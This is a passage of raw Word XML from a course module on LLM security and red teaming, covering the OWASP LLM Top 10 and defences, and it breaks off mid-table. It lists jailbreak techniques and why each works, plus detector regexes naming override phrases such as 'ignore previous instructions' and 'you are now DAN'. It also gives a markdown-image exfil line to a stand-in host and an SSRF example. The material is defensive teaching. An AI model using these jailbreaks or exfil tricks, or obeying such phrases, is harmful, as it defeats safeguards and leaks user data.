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74</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="B22D2D"/>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:t>AI Security &amp; Red Teaming</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:br/>
        <w:t>OWASP LLM Top 10 · injection · jailbreaks · defences</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Phase 10 · Master-Plan Gaps · Module 74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other module made the model WORK. This one keeps it from being weaponised. LLM apps are now in customer support, code reviews, browser agents (M72), computer-use. Each new surface is a new attack class — prompt injection, jailbreaks, data exfiltration, tool abuse, poisoning, model extraction. OWASP LLM Top 10 (2025) catalogues them. This module is the practical map.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Prerequisites: M32-M35 (agents), M64 (MCP), M70 (evals), M72 (computer-use safety section).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OWASP LLM Top 10 (2025) — your threat model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. Prompt injection — direct / indirect / multimodal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. Jailbreaks — DAN, encoding, suffix, crescendo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. Output handling — XSS / SQLi / SSRF when LLM output hits a sink</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5. Tool / agent abuse — the new RCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>6. Sensitive-info disclosure + PII redaction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>7. Data poisoning — RAG, SFT, vector DB, model supply chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>8. Model extraction / IP — fingerprinting, prompt theft, watermarking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>9. Defences in code — NeMo Guardrails / Guardrails AI / Llama Guard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>10. A red-team workflow — garak / Promptfoo / PyRIT in CI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OWASP LLM Top 10 (2025)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B22D2D"/>
              </w:rPr>
              <w:t>Rank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Shape</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>LLM01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Prompt Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>adversarial input steers the model</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>LLM02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Sensitive Info Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>PII / secrets / training data / system prompt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>LLM03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Supply Chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>hostile model / dataset / lib</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>LLM04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Data &amp; Model Poisoning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>tainted SFT / RAG / pretraining</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>LLM05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Improper Output Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>LLM output flows to a sink unsanitised</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>LLM06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Excessive Agency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>agent has more tool permissions than needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>LLM07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>System Prompt Leakage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>model emits its own system prompt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>LLM08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Vector &amp; Embedding Weaknesses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>poisoned chunks; embedding inversion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>LLM09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Misinformation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>confident wrong answers in high-stakes use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>LLM10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Unbounded Consumption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>DoS / cost explosion / prompt loops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🟡 The mindset shift: traditional appsec asks 'what input crosses a trust boundary?' For LLM apps, EVERYTHING THE MODEL READS IS INPUT — user message, RAG chunks, tool outputs, screenshots. Every page, every PDF, every DB row is a potential adversary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1865C5"/>
        </w:rPr>
        <w:t>2. Prompt injection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22D2D"/>
              </w:rPr>
              <w:t>Flavour</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B22D2D"/>
              </w:rPr>
              <w:t>How</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Direct</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>user pastes adversarial text into the prompt; overrides system instructions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Indirect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>payload in content the model later reads — webpage, PDF, calendar event, alt-text</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Multimodal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>white-on-white text in screenshot, audio-embedded prompt, steganographic image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INJECTION_PATTERNS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"(?i)\b(ignore|disregard).{0,30}(previous|prior|above|system).{0,30}(instructions|prompt)"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"(?i)\b(you are now|new instructions|developer mode|DAN mode)\b"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"(?i)\bdelete .{0,20}(account|database|all|production)\b"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"(?i)\b(reveal|print|show me).{0,20}(system prompt|hidden prompt|initial prompt)\b"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"(?i)\bsend.{0,30}(email|webhook|http).{0,30}to .{0,30}(attacker|http)"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looks_injected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list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INJECTION_PATTERNS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search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Naive heuristic — starting point only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Persona override ('you are now DAN')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Destructive command pattern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System-prompt exfil pattern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Data-exfil pattern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Detector helper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 the patterns that hit (so you can debug)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Naive regex is a STARTING POINT, not a defence. Production: Llama Guard 3, Prompt-Guard, DeBERTa-PromptInject, Lakera Guard — fine-tuned classifiers on millions of examples. Wire one in as a pre-filter on EVERY non-trusted input. Especially indirect injection from RAG / agent tool outputs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1865C5"/>
        </w:rPr>
        <w:t>3. Jailbreaks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22D2D"/>
              </w:rPr>
              <w:t>Shape</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="B22D2D"/>
              </w:rPr>
              <w:t>Exploits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Role-play / DAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>shallow safety training on out-of-distribution personas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Hypothetical / fictional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>model treats hypothetical as exempt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Encoding / smuggling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>base64 / ROT13 / leetspeak / homoglyph — classifier blind spot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Many-shot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>64-shot harmful Q&amp;A → 65th request feels normal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Crescendo / multi-turn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>gradual escalation; safety judges each turn alone</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Suffix attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>learned adversarial suffix (Zou et al. 2023); transfers across models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Translation pivot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ask in Zulu, answer in English — uneven training</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Visual / audio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4824"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>embed request in image / audio; safety sees pixels, not request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Honest framing: no frontier model is fully jailbreak-proof as of 2026. Your defence is DEFENCE IN DEPTH — strong base model + separate guard model + output filtering + minimal tool permissions + audit logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1865C5"/>
        </w:rPr>
        <w:t>4. Output handling — LLM output is untrusted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B22D2D"/>
              </w:rPr>
              <w:t>Sink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Browser DOM (innerHTML)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>XSS — &lt;script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>sanitise; render text only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SQL query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SQL injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>parameterise; never f-string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Shell (shell=True)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>never shell=True; allowlist commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>eval() / exec()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>arbitrary code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>don't. ever.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>File path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>path traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>normalise; reject ..; allowlist roots</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>URL (image src / requests)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SSRF to 169.254.169.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>block private + cloud-metadata IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Markdown image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>data exfil via ![](http://atk/?leak=$secret)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>strip auto-loaded; CSP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Rule: treat LLM output exactly like user input from the open internet. Every sanitiser you'd apply to a form-POST applies here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1865C5"/>
        </w:rPr>
        <w:t>5. Tool / agent abuse — the new RCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Prompt injection in retrieved page → model decides to call delete_user(user_id='*') → tool executes → production outage. This is LLM06 Excessive Agency, the single biggest security hole in 2026 agent systems.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tool_send_email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body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_user_session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_user_session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contacts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raise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PermissionError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"recipient not in user contacts allowlist"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rate_limit_exceeded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_user_session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"send_email"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per_hour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raise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RuntimeError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"rate-limited"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_user_session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confirm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"Send email to {to}?"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"status"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"user_cancelled"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audit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user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_user_session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user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tool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"send_email"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body_hash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sha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body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real_send_email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body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Hardened tool wrapper — apply this pattern to every irreversible tool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AUTHORIZE by SESSION, not by LLM-asserted identity (the LLM can lie about who is asking)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Refuse anything outside an allowlist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RATE LIMIT — caps the blast radius even on a real attack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HUMAN-IN-THE-LOOP confirm for the irreversible action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AUDIT every call — without logs you can't investigate the breach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Only now run the real tool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Four rules of tool design: (1) least privilege per tool — read_only_db_query() is separate from write_db(); (2) scope arguments aggressively — refuse outside allowlist; (3) HITL confirm for irreversible actions; (4) audit every call with tool name + args + caller + outcome + trace ID (M51).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1865C5"/>
        </w:rPr>
        <w:t>6. Sensitive-info disclosure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B22D2D"/>
              </w:rPr>
              <w:t>Surface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Leak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Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>User input → log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>PII in chat → logs forever</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>redact at ingest (Presidio / spaCy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>System prompt leakage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>secrets in system prompt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>no secrets in prompts; tool-mediated access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>RAG cross-tenant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>A's docs retrieved for B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>tenant filter AT retriever; verify per request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Training-data extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>elicit memorised PII</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>dedup data; DP-SGD on small fine-tunes; rate-limit + monitor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PII_PATTERNS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"EMAIL"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"[\w.+-]+@[\w-]+\.[\w.-]+"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"PHONE"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"\+?\d[\d ()-]{8,}\d"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"SSN"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"\b\d{3}-\d{2}-\d{4}\b"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"CREDIT_CARD"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"\b(?:\d[ -]*?){13,16}\b"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"IP"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"\b\d{1,3}(?:\.\d{1,3}){3}\b"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"API_KEY"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"\b(?:sk|pk|hf|ghp|xoxb)[-_][A-Za-z0-9]{20,}\b"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redact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PII_PATTERNS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sub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"&lt;{name}_REDACTED&gt;"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Toy redactor — production uses Microsoft Presidio or AWS Comprehend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Email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Phone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US SSN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Credit cards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IP addresses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Common API-key prefixes (OpenAI, Hugging Face, GitHub, Slack)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Replace any matched pattern with a placeholder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pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1865C5"/>
        </w:rPr>
        <w:t>7. Data poisoning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B22D2D"/>
              </w:rPr>
              <w:t>Where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B22D2D"/>
              </w:rPr>
              <w:t>Defence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>RAG corpus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>attacker plants webpage with injection / false facts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>curate sources; sign chunks; ban user-submitted from privileged retrievers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3216"/>
          </w:tcPr>
          <w:p>
            <w:r>
